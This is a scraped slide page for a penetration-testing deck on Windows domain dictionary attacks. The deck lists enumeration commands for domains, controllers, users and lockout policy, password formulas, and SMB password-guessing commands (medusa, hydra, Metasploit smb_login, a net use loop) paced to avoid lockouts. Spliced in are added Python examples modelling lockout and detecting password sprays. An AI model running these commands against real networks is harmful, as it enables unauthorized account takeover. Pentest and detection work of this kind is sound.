OSINT for Attack and DefenseOSINT for Attack and Defense
OSINT for Attack and Defense
Andrew McNicol
 

Similar to Introduction to Windows Dictionary Attacks (20)

Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
 
ethical Hack
ethical Hackethical Hack
ethical Hack
 
Wm4
Wm4Wm4
Wm4
 
Wm4
Wm4Wm4
Wm4
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
 
Gates Toorcon X New School Information Gathering
Gates Toorcon X New School Information GatheringGates Toorcon X New School Information Gathering
Gates Toorcon X New School Information Gathering
 
Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
 
Blue Teaming On A Budget
Blue Teaming On A BudgetBlue Teaming On A Budget
Blue Teaming On A Budget
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
PHP Performance: Principles and tools
PHP Performance: Principles and toolsPHP Performance: Principles and tools
PHP Performance: Principles and tools
 
Tools kali
Tools kaliTools kali
Tools kali
 
OSINT for Attack and Defense
OSINT for Attack and DefenseOSINT for Attack and Defense
OSINT for Attack and Defense
 

Recently uploaded

"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users",  Kevin Goedecke"Scaling RAG Applications to serve millions of users",  Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
Fwdays
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving
 
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
Ajin Abraham
 
From Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMsFrom Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMs
Sease
 
Demystifying Knowledge Management through Storytelling
Demystifying Knowledge Management through StorytellingDemystifying Knowledge Management through Storytelling
Demystifying Knowledge Management through Storytelling
Enterprise Knowledge
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
A Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's ArchitectureA Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's Architecture
ScyllaDB
 
What is an RPA CoE? Session 2 – CoE Roles
What is an RPA CoE?  Session 2 – CoE RolesWhat is an RPA CoE?  Session 2 – CoE Roles
What is an RPA CoE? Session 2 – CoE Roles
DianaGray10
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Introduction to Windows Dictionary Attacks

Identify Domains: Tools
DHCP Info (Auth: No)
  IPCONFIG
NetBIOS Queries (Auth: No)
  NBTSTAT -A <IP>
DNS Queries (Auth: No)
  nmap -sL <IP Range> -oA output_rnds
  ./reverseraider -r <IP Range>
  ./dnswalk victim.com
  perl fierce.pl -dns <domainname> -threads 5 -file <domainname>-dns.output
Sniffing (Auth: No)
  Wireshark (GUI) + filter for browser traffic
  Network Miner (GUI)
  Etherape (GUI)
RDP Drop Down (Auth: No)
  nmap -sS -PN -p3389 <IP Range>, then visit with an RDP client
Enumerate DCs: Methods
Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning
Authenticated Methods
• NET GROUP commands
• LDAP Queries
Enumerate DCs: Tools
DNS Queries (Auth: No)
  NSLOOKUP -type=SRV _ldap._tcp.<domain>
RPC Queries (Auth: No)
  NLTEST /DCLIST:<domain>
  FindPDC <domain> <request count>
Port Scanning (Auth: No)
  NMAP -sS -p389,636 -PN <IP Range>
NetBIOS Scanning (Auth: No)
  FOR /F "tokens=*" %i in ('type ips.txt') do NBTSTAT -A %i
NET GROUP Command (Auth: Yes)
  net group "Domain Controllers" /domain
LDAP Queries (Auth: Yes & No)
  LDAP Administrator (GUI tool)
  Hyena (GUI tool)
  adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq
Enumerate Domain Users: Methods
Unauthenticated Methods
• RPC Queries
• SID Brute Forcing
• SNMP Queries
• LDAP Queries
• SharePoint Fuzzing
Authenticated Methods
• NET USER command
• WMI commands
Enumerate Domain Users: Tools 1
RPC Endpoints (Auth: Yes & No)
  dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt
  enum -N <ip>
  enum -U <ip>
SID Brute Forcing (Auth: Yes & No)
  ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt
  Getacct (GUI)
SNMP Queries (Auth: Yes & No)
  ruby c:\metasploit\msf3\msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E
  Mibbrowser (GUI)
  SNMP Walk
Enumerate Domain Users: Tools 2
LDAP Queries (Auth: Yes & No)
  adfind -b DC=<victim>,DC=<com> -f "objectcategory=user" -gc | grep -i "sAMAccountName:" | gawk -F ":" "{print $2}" | gawk -F " " "{print $1}" | sort > domain_users.txt
SharePoint Fuzzing (Auth: Yes & No)
  Fuzz parameters with Burp to enumerate domain users. Example URL:
  https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2]
NET USERS Command (Auth: Yes)
  net users /domain > domain_users.txt
WMI Commands (Auth: Yes)
  wmic /user:<user> /password:<password> /node:<IP address> domain_users.txt
Get Domain Lockout Policy: Methods
Unauthenticated Methods
• RPC Endpoints
Authenticated Methods
• NET ACCOUNTS Command
What does it all mean?
• Threshold, duration, and window
‒ Lockout threshold: 5
‒ Lockout duration: 15
‒ Lockout observation window: 15
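How the three lockout settings on this slide interact, as an added example in Python that is not part of the original deck: a small replay function models the bad-password counter for a single account (the counter resets once the observation window has passed since the previous failure; reaching the threshold locks the account for the lockout duration). The policy values, timestamps and function names are constructed for the illustration, and the model is deliberately simplified (no replication or PDC chaining between domain controllers).

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed example (not from the slides): a minimal model of how the three
# lockout settings interact for a single account.

@dataclass(frozen=True)
class LockoutPolicy:
    threshold: int     # failed logons that trigger a lockout (0 = never lock)
    duration_min: int  # minutes the account stays locked
    window_min: int    # "reset counter after" observation window, in minutes

# The example values shown on the slide.
SLIDE_POLICY = LockoutPolicy(threshold=5, duration_min=15, window_min=15)

def replay_failures(failure_times, policy):
    """Replay failed-logon timestamps for ONE account against a policy.

    Returns (peak_bad_count, lockout_times).  Model: the bad-password count
    resets to zero once more than window_min minutes have passed since the
    previous failure; reaching threshold locks the account for duration_min,
    during which further attempts are rejected without being counted
    (simplification: a single domain controller, no replication).
    """
    window = timedelta(minutes=policy.window_min)
    count, peak = 0, 0
    last_failure = None
    locked_until = None
    lockouts = []
    for ts in sorted(failure_times):
        if locked_until is not None and ts < locked_until:
            continue  # rejected while locked; does not touch the counter
        if last_failure is not None and ts - last_failure > window:
            count = 0  # observation window elapsed: counter reset
        count += 1
        last_failure = ts
        peak = max(peak, count)
        if policy.threshold and count >= policy.threshold:
            lockouts.append(ts)
            locked_until = ts + timedelta(minutes=policy.duration_min)
            count, last_failure = 0, None
    return peak, lockouts

def minutes(base, *offsets):
    """Helper: timestamps at the given minute offsets from base."""
    return [base + timedelta(minutes=m) for m in offsets]

BASE = datetime(2024, 3, 1, 9, 0)  # constructed start time

# Five failures in five minutes: the counter reaches the threshold, the account locks.
BURST = minutes(BASE, 0, 1, 2, 3, 4)
# Three failures, a 17-minute pause (longer than the window), three more:
# the counter was reset in between, so the account never locks.
SPACED = minutes(BASE, 0, 1, 2, 19, 20, 21)

if __name__ == "__main__":
    for name, times in (("burst", BURST), ("spaced", SPACED)):
        peak, lockouts = replay_failures(times, SLIDE_POLICY)
        print(f"{name}: peak bad-password count {peak}, lockouts {len(lockouts)}")
```

Run it to see the burst sequence lock the account while the spaced sequence, which never exceeds three failures inside any 15-minute window, does not. That difference is why a lockout policy on its own neither stops low-and-slow guessing nor produces a lockout event for the defender to alert on; detection has to look across accounts, not at one account's counter.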
Get Domain Lockout Policy: Tools
RPC Queries (Auth: Yes & No)
  enum -P <IP Address>
  dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt
NET ACCOUNTS Command (Auth: Yes)
  NET ACCOUNTS
Create a Dictionary: Methods
Classics Still Work
• Blank
• Username as password
• password
Common Formulas = Most Effective
• <Password><Number>
• <Companyname><Number>
• <Season><Year>
• <Sports team><Number>
Popular Dictionaries
• Metasploit dictionaries
• RockYou
• FuzzDB
• John the Ripper
Create a Dictionary: Tools
Classics
  Blank password
  Username as password
  "password" as password
Formulas
  <Password><Number>
  <Companyname><Number>
  <Season><Year>
  <Sports team><Number>
Your Brain!
  Think of keywords related to the target company or its geographic location and you'll get more out of your dictionary attacks!
RockYou
  http://www.skullsecurity.org/wiki/index.php/Passwords
FuzzDB
  http://code.google.com/p/fuzzdb/
  https://github.com/rustyrobot/fuzzdb
John the Ripper
  http://www.openwall.com/wordlists/
Perform Dictionary Attack: Rules
The Rule to Live By: Respect the lockout policy
• General idea: attempt a few passwords against all of the domain users each round, not 1,000 passwords against one user
• Subtract 2 attempts from the lockout policy. Example: Lockout=5, Attempts=3
• Wait 5 to 10 minutes beyond the observation window
Perform Dictionary Attack: Tools
Medusa (Linux)
  medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
Bruter (Windows)
  Easy-to-use GUI; no CLI that I know of.
Metasploit smb_login (Windows and Linux)
  ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\passwords.txt USER_FILE=c:\allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E
Hydra (Windows and Linux)
  hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb
Batch Script (Windows)
  FOR /F "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<user> %a
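The round-based pattern described in the rules above (a few passwords against many accounts, paced to stay under the lockout threshold) leaves a distinctive footprint in the domain controllers' logon-failure events, and it is the pattern a blue team should expect to see when a contractor follows this approach. As an added example that is not part of the original deck, the Python below parses constructed sample lines shaped like the fields a SIEM keeps from Windows Security event 4625 and flags any source that fails against many distinct accounts inside one observation window, reporting the per-account maximum so the analyst can see the attempts stayed below the lockout threshold. The log format, addresses, account names, function names and alert thresholds are all constructed for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real event-log output).  Each line mimics the
# fields a SIEM typically keeps from Windows Security event 4625 (logon
# failure): timestamp, event ID, target account and source address.
# 10.0.0.5 tries two passwords against six accounts, five minutes apart;
# 10.0.0.9 fails four times against one account; one 4624 line is noise.
SAMPLE_LOG = """\
2024-03-01T09:00:01 4625 TargetUserName=alice IpAddress=10.0.0.5
2024-03-01T09:00:02 4625 TargetUserName=bob IpAddress=10.0.0.5
2024-03-01T09:00:03 4625 TargetUserName=carol IpAddress=10.0.0.5
2024-03-01T09:00:04 4625 TargetUserName=dave IpAddress=10.0.0.5
2024-03-01T09:00:05 4625 TargetUserName=erin IpAddress=10.0.0.5
2024-03-01T09:00:06 4625 TargetUserName=frank IpAddress=10.0.0.5
2024-03-01T09:01:10 4625 TargetUserName=bob IpAddress=10.0.0.9
2024-03-01T09:02:10 4625 TargetUserName=bob IpAddress=10.0.0.9
2024-03-01T09:02:30 4624 TargetUserName=carol IpAddress=10.0.0.7
2024-03-01T09:03:10 4625 TargetUserName=bob IpAddress=10.0.0.9
2024-03-01T09:04:10 4625 TargetUserName=bob IpAddress=10.0.0.9
2024-03-01T09:05:01 4625 TargetUserName=alice IpAddress=10.0.0.5
2024-03-01T09:05:02 4625 TargetUserName=bob IpAddress=10.0.0.5
2024-03-01T09:05:03 4625 TargetUserName=carol IpAddress=10.0.0.5
2024-03-01T09:05:04 4625 TargetUserName=dave IpAddress=10.0.0.5
2024-03-01T09:05:05 4625 TargetUserName=erin IpAddress=10.0.0.5
2024-03-01T09:05:06 4625 TargetUserName=frank IpAddress=10.0.0.5
"""

LINE_RE = re.compile(r"^(\S+) (\d+) TargetUserName=(\S+) IpAddress=(\S+)$")

def parse_failed_logons(text):
    """Return [(timestamp, account, source)] for every 4625 line; other
    event IDs and unparsable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group(2) != "4625":
            continue
        events.append((datetime.fromisoformat(m.group(1)), m.group(3).lower(), m.group(4)))
    return events

def detect_spray(events, window=timedelta(minutes=15), min_accounts=5):
    """Flag sources that fail logons against >= min_accounts distinct accounts
    within any `window`.  Per-account counts are reported so an analyst can
    see that each account stayed below the lockout threshold, which is why
    lockout-based alerting alone does not catch this pattern."""
    by_source = defaultdict(list)
    for ts, account, source in events:
        by_source[source].append((ts, account))
    alerts = {}
    for source, evs in by_source.items():
        evs.sort()
        best = None
        # Slide a window starting at each failure and keep the widest spread.
        for i, (start, _) in enumerate(evs):
            per_account = defaultdict(int)
            for ts, account in evs[i:]:
                if ts - start > window:
                    break
                per_account[account] += 1
            if len(per_account) >= min_accounts and (best is None or len(per_account) > best["accounts"]):
                best = {"accounts": len(per_account),
                        "max_per_account": max(per_account.values()),
                        "window_start": start}
        if best is not None:
            alerts[source] = best
    return alerts

if __name__ == "__main__":
    for source, info in detect_spray(parse_failed_logons(SAMPLE_LOG)).items():
        print(f"possible password spray from {source}: {info['accounts']} accounts, "
              f"at most {info['max_per_account']} failures each, from {info['window_start']}")
```

The single-account burst from 10.0.0.9 is not reported here because it is a different signal (it would trip the lockout counter on its own); the spray from 10.0.0.5 is reported precisely because no account ever came close to the threshold. Tune min_accounts and the window to the domain's actual lockout policy and to the number of accounts a legitimate client could plausibly touch.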
Conclusions
• There is more than one way to do everything!
• Enumerate all available options
• It's easy to lock out accounts – respect the password policy
• Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests